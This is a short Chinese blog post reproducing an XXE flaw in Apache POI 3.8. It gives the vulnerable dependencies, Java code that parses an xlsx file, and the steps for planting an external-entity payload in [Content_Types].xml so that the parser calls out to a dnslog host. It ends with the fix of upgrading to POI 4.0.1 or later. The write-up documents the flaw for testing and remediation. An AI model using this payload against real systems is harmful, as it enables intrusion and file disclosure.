org.apache.poi 3.8 excel xxe漏洞复现

复现步骤

pom.xml引入依赖

<dependency>
    <groupId>org.apache.poi</groupId>
    <artifactId>poi</artifactId>
    <version>3.8</version>
</dependency>
<dependency>
    <groupId>org.apache.poi</groupId>
    <artifactId>poi-ooxml</artifactId>
    <version>3.8</version>
</dependency>

关键代码：

public String readExcelData(String path,String sheetName) throws IOException {
        FileInputStream fileInputStream = null;
        fileInputStream = new FileInputStream(path);
        XSSFWorkbook sheets = new XSSFWorkbook(fileInputStream);
        //获取sheet
        sheet = sheets.getSheet(sheetName);
        //获取行数
        int rows = sheet.getPhysicalNumberOfRows();
        StringBuilder cell= new StringBuilder();
        for (int i = 0; i < rows; i++) {
            //获取列数
            XSSFRow row = sheet.getRow(i);
            int columns = row.getPhysicalNumberOfCells();
            for (int j = 0; j < columns; j++) {
                cell.append(row.getCell(j).toString()).append("</br>");
            }
        }
        return cell.toString();
    }

xxe.xlsx解压后，修改[Content_Types].xml,在第二行加入

<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://dnslog/test.dtd"> ]>
<x>&xxe;</x>

访问后即可触发dnslog

解决方案：

升级poi到4.0.1以上版本

posted @ 2022-02-28 18:42 妇愁者纞萌阅读(838) 评论(0) 收藏举报

刷新页面返回顶部

org.apache.poi 3.8 excel xxe漏洞复现

公告